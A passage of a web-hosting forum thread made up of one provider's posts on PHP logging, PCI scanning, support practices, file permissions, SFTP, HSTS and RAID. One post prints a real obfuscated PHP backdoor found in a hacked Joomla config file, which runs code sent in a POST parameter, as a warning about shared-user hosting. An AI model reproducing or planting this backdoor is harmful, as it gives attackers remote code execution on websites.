|
tj9991 posted:After five months of hosting with Apis Networks I have cancelled and moved to Linode. I do not recommend Apis Networks for anyone planning on using PHP. I handled your issue. The problem was two-fold, first you designated a separate file to log errors outside the default, which merges Apache and PHP errors into /var/log/httpd/error_log. Ownership of the log file precluded the HTTP server from logging errors. Permissions still was not changed when I examined your setup further. Second, the error reporting level configured via .htaccess was downgraded, which excluded E_WARNING and E_NOTICE types (9999 or so if memory serves me correct). Only fatal errors would have been logged even if permissions were corrected. PHP documentation recommends using 2147483647 as your error_level in a .htaccess directive. Odd you had such a speed discrepancy. If you still want to troubleshoot speed issues, send me a PM or e-mail with your IP and traceroute to 64.22.68.16, which is based in Atlanta. It may be a gross exaggeration as server loads are minor, around 0.25-0.5 on Helios around the clock. edit: E_NOTICE/E_WARNING nem fucked around with this message at 01:21 on Feb 21, 2013 |
# ¿ Feb 21, 2013 01:17 |
|
|
# ¿ Apr 25, 2024 05:03 |
|
LordMaxxie posted:If you have cPanel, I believe you can get a McAfee's PCI scan (every 3 months) for free. Couple that with the self assessment questionnaire and you're right to go. I'd caution against Trustwave, having been on the administrative end of their scanning. Most PCI scanners load up Nessus or another variant with minimal intelligent rulesets to factor in backports from Redhat Enterprise Linux/CentOS. Trustwave, for example, will scan the major/minor of OpenSSH and exclude patch levels that are backported from RHEL to amend a CVE. I've had clients escalate verified CVE patches from Redhat to Trustwave without success. Additionally, I've used SecurityMetrics for PCI scanning that was bundled with FirstData at the time. Very similar results with whitelisting CVEs that could not be physically exploited with the given environment, but based upon the pattern match, was deemed "vulnerable". FirstData cannibalized that partnership and setup Rapid Comply. Six month and 2 scans in, so far so good. There hasn't been any false positives. Unless you know your environment inside-out and have strict policies in place to safeguard credit card data, use a third-party to handle credit cards. FirstData provides recurring billing through their system, and they've been fantastic since placing them in a bidding war with Elavon for merchant accounts a couple years back.
|
# ¿ May 21, 2013 04:19 |
|
DarkLotus posted:Serious question... If a hosting provider does not offer phone support, is that a deal breaker for you? Why? I'll opine from the opposite side of the fence: Phone is an enormous time sink compared to e-mail. I'll handle 2-3 tasks concurrently ~40% of the time every day. If I have a window open for issues, e-mail is active in the background. If I need to handle a major issue, phone is silent and e-mail is suspended. You can easily interleave multiple tasks while you're waiting on a response for someone or waiting for task to finish whereas with phone it's an attentive waiting game for the client to type in a password, then realize only after submitting that a mistake was made in the password or pedantically spelling out a URL letter by letter. Phone is kept for emergency situations only, but even then if there is an emergency (DoS for example), phone goes on silent and other forms of communication are used to address en masse, particularly Twitter. I always enjoy the question of, "well, when you do you expect it to get fixed?" to which the only genuine answer is, "the time is would have normally taken plus the time spent on the phone explaining this to you."
|
# ¿ Feb 22, 2014 05:42 |
|
Arboc posted:If addr.com is just your DNS host (and not the registrar) then you probably don't need to transfer the whole domain to a new registrar, and you shouldn't be at risk of losing control of the domain itself. You'll still probably have to find a new host, and you may have to work around issues trying to migrate the individual pieces; I've seen some smaller all-in-one web companies that make things needlessly difficult when you try to take matters into your own hands. Valid point. Can we update the OP to include a list of hosting providers that make things unnecessarily encumbering to accomplish? EPP-restrictive registrar transfers, non-existent DNS administration, inaccessible file retrieval, etc. Basically a blacklist of shoddy support to help others steer away from these situations, because we're here to help others not go down the same path... and over the years the record is starting to track.
|
# ¿ Jun 3, 2014 06:31 |
|
fletcher posted:I've had a dedicated server through Future Hosting for years in their Chicago DC and it's been great. Up until recently that is, when my download speed will slow to a 32KB/s crawl for hours on end. During the slowness I can speedtest my connection and get 3MB/s. I was also able to download a test file on the server from an AWS machine and it hit 10MB/s. So both me and the server have plenty of bandwidth to spare, is it just my routing that is hosed or something? Too many people around here watching Netflix? Does it happen continuously during set intervals or sporadically? If so, network congestion somewhere along the path between your connection and the data center (most likely data center). You could use something like webpagetest.org with a simple page stuffed of data to ascertain download speeds from other places across the globe - or - just do a traceroute (mtr/winmtr) and look for congestion via high pings. If sporadically, it's probably a Broadcom NIC
|
# ¿ Jun 27, 2014 03:32 |
|
fletcher posted:It sounded pretty conclusive. I've been able to reproduce the slowness from a completely different locations in California now. They asked for the mtr report and I provided it, and they said there's no indication the issue is with something they control. Yes, it's just a mtr from the server to your IP. Dropped ping replies are caused by network policies that throttle or filter echo replies out entirely. There could be QoS implemented somewhere upstream in the network. That would be evident in your reduced bandwidth throughput during peak hours, but not necessarily ping times.
|
# ¿ Jun 27, 2014 19:30 |
|
cstine posted:During my "career" doing random IT contracting stuff, that was almost EVERYONE I dealt with. I think there's an idiom to express this fallacy... Yes: penny wise and pound foolish. Kiva several years ago hosted their non-profit charity through Dreamhost, and after a couple months once the goodwill charity exploded, it - to the owners' prudence - seemed practical to remain with Dreamhost remitting $6/mo in hosting fees while bringing in $10k in charitable contributions. Then, growth propelled and service slowed down as Dreamhost amassed more clients onto the server until a move seemed onerous. Rather than jumping to a dedicated server for $100/mo at the time, the owners decided it to be salient to complain on the forums about the subpar service. It fell upon deaf ears. Decision-makers need to decide what is right. Cutting corners, cutting costs, and zapping a lifeline to your business proves nothing more than your impracticality and reluctance to believe in an idea. I'm not for dropping $300/mo in a concept; in fact, I spent a couple years as a sole proprietorship. I am, however, advocating that people need not be stupid in evaluating your future plans. Look at short-term growth. If your growth is climbing, then anticipate a positive trajectory. If your growth has stagnated or worse: plateaued, then evaluate a graceful departure. Don't flip-flop these strategies by building crap for growth and growth for crap. It takes just a little bit of sensibility, and that's the problem I've seen time and time again within the hosting industry.
|
# ¿ Aug 15, 2014 06:04 |
|
onionradish posted:I just switched a client from a crappily-managed Rackspace reseller account to Bluehost. During the time gap between DNS switchover, some emails went to the old server. I'd like to get access to those emails through webmail or something before we decomission the old servers. Mistrust is justified. Most mail is stored as Maildir, so it's a matter of copying the single-file messages over as-is to the new server. If you have your old IP address handy, edit your hosts file and add a DNS entry for mail.hostname.com to the old IP address. You will be able to pull up webmail on your old host. But then again, it's just sloven mismanagement by your old reseller. They can provide you with the messages should they choose to do so.
|
# ¿ Oct 10, 2014 23:40 |
|
Rufus Ping posted:Paradoxically the most professional and lowest-bullshit registrar I've been with is also one of the cheapest, internet.bs. This may be because both qualities are valued by their original customer base, professional domainers with large portfolios. Never bite the hand that feeds.
|
# ¿ Dec 11, 2014 06:09 |
|
Skywalker OG posted:Looking for some help. My employer's website was defaced. We use Hostgator currently. It seems like they've been compromised because I created a support ticket a week ago and when I called them for an update, they said that they have hundreds of support tickets and I'm rather far back in the queue. They then referred me to a couple of website antivirus / firewall providers. Once defaced, your files aren't secure either, since on those setups every single file (web assets, maybe e-mail) on your account has the same accessibility rights as that file initially defaced. Hackers today will inject code into files that can only be triggered with the right combination of query parameters, so unless you pass along the right GET request, it'll appear safe. Nuke your Cubecart assets or check for files modified within the last week (find from the shell works: find . -mtime -165 -print ). Check anything modified within the last week carefully, looking for arbitrary code that doesn't belong. If it's there, assume your files have been compromised too as a consequence of running everything under a single user. Once your account is defaced, and you run php-fpm or php-cgi under the same user as your account (big box hosters do this for resource accountability), assume all files have an equal chance of being tainted with malicious bootloader code or viewed by a third-party. Also, good opportunity to update Cubecart, since there are some vulnerabilities in the wild. Sorry about missing your live chat request earlier. Had to head up to North Atlanta this afternoon for a funeral I had just found out about last night. Edit: thought about this a little more tonight to draw a parallel: consider having 2 keys. One keys is a skeleton key that opens every door in your house. Another key opens just the basement stuffed full of junk. An intruder grabs a hold of your basement key - not an issue; you have an understanding it may get broken into eventually. An intruder grabs a hold of your skeleton key - problem, insofar as he now has access to every room in your house and every piece of valuable good/information. It's the same issue when you run your WordPress/Drupal/Joomla! under the same user as your personal files and other web page assets. When you run your site on Hostgator and EIG's siblings, that's going to happen when only one user exists and that's shared between your web files and your personal files. You have one key and it is a master key. If that's compromised, then you're in a world of hurt, because now they have access to your e-mail, if stored on the same server, SSH keys, and depending upon partitioning likely other domain content. So please be mindful. Hacking isn't a rudimentary point-and-click WinNuke like a decade ago (nor are DoS attacks). With time comes dissemination of knowledge and hackers too build better tools to carry out more sophisticated, undetectable attacks. I've seen it in post-mortem analyses of hacked accounts that were time and time again a victim of outdated software. Whenever there is a breach, there is curiosity too of what else lurks on your site. Had something sensitive nestled among your files? Now you have a big problem on your hands. TLDR: flatten and reinstall if you're unsure of the scope of damage nem fucked around with this message at 05:42 on Jan 16, 2015 |
# ¿ Jan 16, 2015 01:12 |
|
Skywalker OG posted:Sucuri is much cheaper at $99 per year, but realistically we would drop them after they have fixed the problem to a satisfactory degree. This is why security relapses occur. If you've proven up along the managerial chain unable to keep a site secure, what realistically makes you think this won't happen again? Thalagyrt posted:If you have the capability (you most likely don't on shared hosting) you should set up your web worker as a completely separate user from the user that actually owns your web directory. Doing so would entirely eliminate a lot of the big pain point you're seeing and make a web application firewall mostly unnecessary (it still could save you from some things)... It might be possible with nem's kick-rear end custom panel, but I can't speak to that directly as I don't know much about what he's built over there. Yes, this is the correct approach, and yep that's what we've done for a long time.
|
# ¿ Jan 16, 2015 22:51 |
|
Skywalker OG posted:We're an extremely small nonprofit organization full of old people with no IT department and historically something bad has had to happen to us in order for our board of directors to care about it enough to act. Vote the least useful director off your board and accommodate a $99/year budgetary increase. Your reputation and reliability are more important and more costly than $8/mo. If your organization has issues accommodating a $8/mo increase, then there is some administrative fat/misconduct within the organization that go beyond this thread. Sites have 4 vulnerable vectors ordered from most to least likely to be vulnerable: (1) compromised user accounts caused by lack of AV software typically penetrated by unsafe browsing habits, (2) software in place of your web site, (3) server software itself, (4) serendipity. 1 and 2 are interchangeable depending upon how well you keep on top of things. Make it a habit to check the vendor's web site once a month, maybe the first, to see if there's a new version available. Incremental upgrades are always easier than major upgrades, because you were forced to upgrade in light of getting hacked. Based upon your information, I don't believe exclusively HG is to blame. You might do well with a VPS. You might do well with shared hosting from any recommended brand in the first page. But, you might relapse and continue to do so in perpetuity until your organization gets its head out of its rear end and takes its accountability more seriously.
|
# ¿ Jan 17, 2015 00:00 |
|
Skywalker OG posted:You're absolutely right. We're increasing our online presence without having anyone on-staff to manage it or make sure we are protected. As an organization with an online shop, we are also being extremely irresponsible with customer data. Thanks so much for all of the advice you have given me so far. Just to give you an idea of the sophistication now, this is a client's configuration file modified by a hacker that I came across today via feedback loop: php:<?php $sF="PCT4BA6ODSE_"; $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10]. $sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1]. $sF[7].$sF[8].$sF[10]); $s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]); if (isset(${$s20}['n88b749'])) { eval($s21(${$s20}['n88b749']));}?><?php class JConfig { public $offline = '0'; public $offline_message = 'This site is down for ma Typically it's one line, but I had to break it into a few lines to make it play nice with the forums. The only reason why this happened is because the file is permitted alteration, by the web server user, by its permissions (client got lazy and applied 777 to all files). If the file had permissions 755, and a different owner than that under which the web server runs, then the web server could have read it, but not modified it. With Hostgator and other EIG brands, you lose this added security, because the attack happens under the same user as the rest of your files. Unless you enumerate every file and scan for anomalous changes (like this), then there's no guarantee your frontend software is safe. nem fucked around with this message at 09:51 on Jan 19, 2015 |
# ¿ Jan 19, 2015 01:23 |
|
McGlockenshire posted:Sooooooo, CGI is the problem instead of 0777 permissions? No, the issue is any system in which the web server or process lifecycle operates under the same user that is privileged with access to the rest of the user's files. CGI/FCGI/FPM whatever wrapper you're using that switches users to process a request is vulnerable. That approach, common among hosting companies, is as insecure as setting permissions to 777. Damage scope is changed (all your files vs all of someone else's). 777 is bad because members of your group can run amok and modify any of your files. 717 works, if you keep 1 user, the web server in the other group, because there are no other members of the other group that can touch your assets. Sometimes 777 doesn't work because it's a mixed environment of other users. In those cases, you should use run the web server as a separate user and grant write permissions through ACLs to those files which the web server must write/modify, e.g.: code:
code:
It's not perfect, but it's pretty close to being so.
|
# ¿ Jan 20, 2015 16:12 |
|
DarkLotus posted:On a multi-user system, you probably don't want to make something world-writeable if your already concerned about it being group-writeable. Depends upon setup: as long as every user with access to a particular filesystem slice is part of the group, except for one user, the web user, then 717 works. 1 would be applied to group, 7 to others not matched in the group per discretionary access control implementation. It's a dumbed-down version; ACLs or SELinux are better, albeit more intense, options. Once you have another user outside that group with the same filesystem visibility, then 717 fails. It requires a combination of jailing and application access restrictions to properly implement. \/ - ACLs (setfacl command) and SELinux. Setup works great on a VPS. Not so much for massive hosting companies without the tweaks as noted above. nem fucked around with this message at 01:50 on Jan 27, 2015 |
# ¿ Jan 27, 2015 00:38 |
|
eightysixed posted:I've not used WordPress in quite sometime, but I remember having to set-up sFTP for a number of clients via the "Dashboard" for plugins/updates and such, and it being a pain in the balls. If you have an open FTP and not utilizing sFTP what's the point? Unless I'm missing something, in which case eightysixed derps all day every day. Depends, again, on the circumstances. If the FTP hostname isn't "localhost", then the FTP server may reside outside the server and network traffic will pass outside the server onto the network, liable to be sniffed. If the FTP server resides on the same server as WordPress, then use localhost. Traffic won't pass outside the server, unless the server is compromised, and a privileged user is capturing local traffic, if so, then you've got bigger issues on your hands with possible rooting. FTP password in that case will pass on a TCP socket connected locally on the server bypassing switch. SFTP requires ssh as a wrapper, so there's a dependency upon the host to support ssh on the account. I hope in some time that WordPress will integrate Auth TLS support into its built-in FTP client. That solves the issue of encrypting the endpoint without relying on ssh. If you're going over an insecure, public connection with WordPress, then your wp-admin portal should be secured with SSL. That way not only is your admin password encrypted, but also your FTP credentials. Using FTP, and running a separate web server, creates a permission partition between what you can access and the web server. It's the same reason we have UAC in Windows edit: nuances nem fucked around with this message at 19:54 on Jan 27, 2015 |
# ¿ Jan 27, 2015 05:24 |
|
/\ - true, sniffing in this case. In either situation, there's someone on the server listening to traffic with elevated privileges.Thalagyrt posted:SFTP is not SSH wrapped around FTP. SFTP is a completely different protocol that's built into SSH. The only thing it has in common is the name. It's like Java and JavaScript. It ships with openssh and on vanilla Linux platforms ties into the sshd PAM provider. Sure, you can separate these two, but going back again to contrived scenarios I don't think most providers will go through the hoops to separate ssh and sftp-server. 90% of those layouts will look like: code:
nem fucked around with this message at 18:55 on Jan 27, 2015 |
# ¿ Jan 27, 2015 18:39 |
|
Thalagyrt posted:I was specifically addressing this: need coffee
|
# ¿ Jan 27, 2015 19:23 |
|
Rufus Ping posted:you seem to be confusing promiscuous mode with CAP_NET_RAW or something. The NIC being in promisc mode does not enable anyone on the same box to listen in on your FTP connections, as you seem to be suggesting Yes, raw traffic capability is a broader, and more suggestive term. Original post has been amended.
|
# ¿ Jan 27, 2015 19:53 |
|
Biowarfare posted:same thing with persisting sessions across http to https: if you land on http, redirect to https for login, your page is ALREADY insecure, and there is no point in doing so. HSTS fixes that, but there's always laggards in adoption (IE, coming in 11). Even a redirect via mod_rewrite to https would leak cookie and other sensitive data in the request if the https request flops back to http. So we're probably, based on IE6 obsolescence, 10+ years from HSTS becoming fully-implemented by most web users. Additionally, you can set cookies as secure. If a request goes from https to http, and a cookie is marked as secure, it won't get transmitted in the request. Request URI will still leak in that case. edit: coulda/woulda/shoulda nem fucked around with this message at 17:35 on Jan 30, 2015 |
# ¿ Jan 30, 2015 17:28 |
|
cstine posted:TimThumb.php. ... and it still insisted on using the "DOCUMENT_ROOT" server variable when storing thumbs. If you used mod_rewrite to serve content from another location, it altogether ignored WordPress requiring custom patches.
|
# ¿ Feb 24, 2015 18:33 |
|
BlackMK4 posted:Eh, figured out I don't have to install it. Just use the binary compiled with make. Thanks --prefix=/usr/local is standard practice. Although, it depends on your medium. I know for the KB, which is built on WordPress, I've relied on Jetpack that works well to discriminate bots from humans. Webalizer, Analog, and AWStats (the big free 3) have been rather dormant for some time ceding to bigger commercial players in the market, chiefly Google Analytics and other value-added services that provide bundled analytics. I'd just stick Google Analytics into your site and go from there. You'll get a better resolution of visitor traffic over Webalizer/Analog/AWStats that provide only baseline traffic, i.e. how many spam bots have pulverized your site in the last 24 hours.
|
# ¿ Mar 20, 2015 06:06 |
|
Oopsie doodle... Press release Edit: better quality discussion of folks still silly enough to use them via WHT nem fucked around with this message at 04:46 on Apr 1, 2015 |
# ¿ Apr 1, 2015 04:07 |
|
Anaxite posted:Except Chrome for Android, which gives the error "NET::ERR_CERT_AUTHORITY_INVALID". Is there a possibility the root certificates installed on that Android are out of date? What Android version is the phone running?
|
# ¿ Jun 14, 2015 16:26 |
|
Anaxite posted:I tested this on Android 4.2.2 and 5.1.1, Chrome versions 43 and 44 beta. Only time I've seen that happen then is when the intermediate certificate isn't present in the handshake, i.e. in Apache SSLCertificateChainFile is missing or supplying an erroneous certificate - you can send as many as necessary, client will only use those certificates applicable to resolving the chain. At least one path must be sent by the server (i.e. not an additional download) resolving up to a certificate trusted in its store. That store would be the root certificates in the phone's OS. So either the chain isn't sent or the CA (gandi) isn't trusted in the root certificates that ship with both OSes (unlikely).
|
# ¿ Jun 14, 2015 17:16 |
|
reddit liker posted:
Install etckeeper and push your repo to a private repo on github or another server.
|
# ¿ Aug 31, 2015 16:09 |
|
Biowarfare posted:this is still the personal favourite ive g otten from a hosting provider Just got one from 1and1 regarding some undocumented blacklist heuristics they implement (or a faulty network on their end): quote:Thank you for contacting us. When your hiring manager consists of a pigeon with a keyboard \ Edit: and the cycle continues nem fucked around with this message at 00:38 on Sep 27, 2015 |
# ¿ Sep 26, 2015 23:57 |
|
hayden. posted:I use DigitalOcean. I recently tried to SSH into my server that I hadn't SSH'd into in a long time. The private key I have has definitely not changed, but I get a "Server refused our key" error. Root password doesn't work and I'm not sure there was one originally (just the key). I tried resetting the password using DO's control panel and it didn't work. Trying to login using the console on DO's website has me log in as root, change the password, then immediatly kicks me out to login again. Logging in with the new password works for a split second but then kicks me back to login. I have no idea what I configured here. Did you foul up one of the PAM modules? Or did you get hacked and the hacker, being a douche, add "exit" into your .bash_profile? I'd try booting up into single-user mode, then logging in from whatever tty terminal DO provides.
|
# ¿ Sep 29, 2015 01:56 |
|
hayden. posted:If I had to guess, at some point in time I was following some tutorial that recommended disabling the ability to log in as root. Pass "single" to your initrd to force single-user mode, if you've got the ability to edit your boot options. I'm not terribly familiar with DO's interface. On Linode at least you can toggle single-user bootup in the VM config. Next time don't follow what someone else has written without comprehending its implications
|
# ¿ Sep 29, 2015 02:51 |
|
Thalagyrt posted:Hell, $5.95/mo is basically the same price as a small VPS, which would give you a lot more control. And a lot more responsibility to keep your machine secure, which often don't go hand-in-hand.
|
# ¿ Nov 13, 2015 18:59 |
|
WordPress will handle minor updates automatically. And there's a plugin to coalesce major updates into this automatic update process.
|
# ¿ Dec 25, 2015 07:36 |
|
Thalagyrt posted:The catch to that is that you have to give WordPress write access to itself, which is a patently bad idea if you care at all about not getting owned. Would you rather take 1 fist or 2 fists up the rear end? Neither solution is optimal; pick the best worst solution. At least in this setup you can be proactive, rather than reactive. More importantly, you have less to think about, which is the OP's goal. Alternatively, a separate user apart from the web server can own the files and that information stored in wp-config.php for automatic FTP updates. Your tradeoff is that FTP login info for this user is stored in wp-config.php, which again can lead to getting owned... Then again, if a hacker has access to one ingress, backdoor installation is so drat trivial.
|
# ¿ Dec 25, 2015 23:22 |
|
Thalagyrt posted:Nah, I'd rather give WordPress no write access other than wp-content/uploads, and explicitly disable PHP execution in wp-content/uploads. Upgrade it manually, either by relaxing permissions temporarily (if you're lazy) or ideally by pushing out an entirely new codebase as a new atomic release using something like capistrano + git, symlinking content directories in from a common shared folder. The benefit of that, of course, being that your git repo instead of web server is authoritative for what code belongs on your web server. A hole elsewhere in its codebase will still allow arbitrary execution regardless of whether uploads/ or themes/ are satisfactorily locked down. You might halt its spread, but compromised accounts or a newfound spam relay are just as obnoxious as a security relapse. The only practical solution is vigilance. Always be on top of updates. You can make the exposed surface smaller, but a hole is a hole and in 13 years I can only attest to one thing: end-users are a mixed bag of ability. Never assume too much.
|
# ¿ Dec 26, 2015 00:30 |
|
Bob Morales posted:How many big ugly security breaches is that for them? Ugh. It hit Zayo's data center in Atlanta. We were affected, as was the entire data center, including its in-house brand NetDepot. The attackers hit the edge router instead of actual machine they wanted to offline. Around 2 hours of intermittent downtime on New Year's Day . Sometimes you feel bad for the network engineers who mitigate these onslaughts.
|
# ¿ Jan 5, 2016 21:22 |
|
/\ - What he said. Got caught up in a ticket Thalagyrt posted:That's not propagation - that's cache expiration. The two are very different concepts. Propagation implies that the source is pushing data to consumers, whereas the reality is that the consumers are pulling data from the source upon request and caching it. That's senseless pedantry. When we refer to propagation typically we're not talking about replication among slaves. We're referring to cache expirations from local resolvers and at what point 95% of resolvers will pull the new records. Some upstream resolvers do violate prescribed TTLs, but for the most part propagation = cache, because propagation among slaves is drat near instantaneous.
|
# ¿ May 10, 2016 01:01 |
|
Biowarfare posted:http://bounceweb.com/ajax-hosting.html Last time BounceWeb was around this block, the thread turned into a shitstorm because their policies forbade ffmpeg... and sure enough the article on ffmpeg hosting is still there . Oh well, let's see how many suckers that thread can ensnare.
|
# ¿ Jun 3, 2016 01:34 |
|
RAID0 These guys haven't had any serious disasters in 30 days since rolling it out or use 2-disk setups.
|
# ¿ Jul 6, 2016 19:18 |
|
MrMoo posted:RAID 0 on SSD is an improvement from mechanical drives, from the underlying storage perspective it is reasonable as there is already error recovery in place, you are only beholden to the controller flaking out which is likely for any other chip in the data path too. Having no mechanical parts will certainly improve its reliability, but electronics fail. I've had everything on PowerEdge servers, from power supplies to LCD bezels, die over 14 years. Intel recorded its AFR at 0.61% for SSD over 4.85% for mechanical; of course this is 2011 and technology has only improved. Failure, however, remains a going concern. Rolling out machines with 8+ devices in RAID0 greatly amplifies that initial 0.61% risk of 1 unit failing. Whether SMART catches it or not and whether they act on it (or have the parts on site to do so) depends upon their competency. Something tells me at that price point competency isn't their strong suit.
|
# ¿ Jul 7, 2016 20:21 |
|
UGAmazing posted:
Any particular reason you want to gravitate towards a big-box host that reduces your account to ink on a 10-K filing? Those are all very reasonable requests that either DarkLotus (Lithium) or myself pride ourselves on providing for clients.
|
# ¿ Aug 18, 2016 17:14 |
|
|
# ¿ Apr 25, 2024 05:03 |
|
nictuku posted:I'm creating a database-as-a-service infrastructure, so providers can sell managed MongoDB, MySQL, Redis, etc to their customers. quote:My job is to deploy clustered database and then maintain, backup, monitor, make everything fault-tolerant and auto-scaled. If the database breaks, I'm the one to fix it. Since my cost to run a 1GB RAM server is the same as running a 128GB server, I'd charge a flat fee per server. The fee would be low enough to make this super attractive to hosting providers. quote:The hosting provider would be responsible for 1) servers, network, etc; 2) customer acquisition; 3) customer support. quote:Since these are things that hosting providers are already very good at, I see this a win-win for everyone. Customers get managed services from providers they like; providers get new revenue with little extra operational overhead and; I get my fair share too! Providers can either get new customers, or upsell their existing ones. quote:I see a bunch of managed MongoDB companies popping up, including one acquired by IBM (compose.io), so there's gotta be a market for this, right? I could see this being a complementary service to something like ServerPilot, which I hold my own reservations as to the actual efficacy of, to wannabe sysadmins who purchase VPSes that have no earthly clue as to what they are doing. Throw in a simple monitoring dashboard that works with all of the NoSQL/RDBMS' out there, attach a $0 price tag, and charge on support (charge hand over fist might I add!) and you have a product that could be received very warmly for IaaS providers like Linode, DO, and Vultr. Edit: For premium version add: easy clustering and replication. For free version: background optimization like what ktune/tuned does, e.g. mysqltuner.pl Database loads adjust over time. Having something constantly working in the background, monitoring, making inferences, and then tuning to squeeze maximum performance out would be a killer feature. If you were to make an easy sell, that's the feature that would arouse my interest. nem fucked around with this message at 05:34 on Aug 19, 2016 |
# ¿ Aug 19, 2016 05:11 |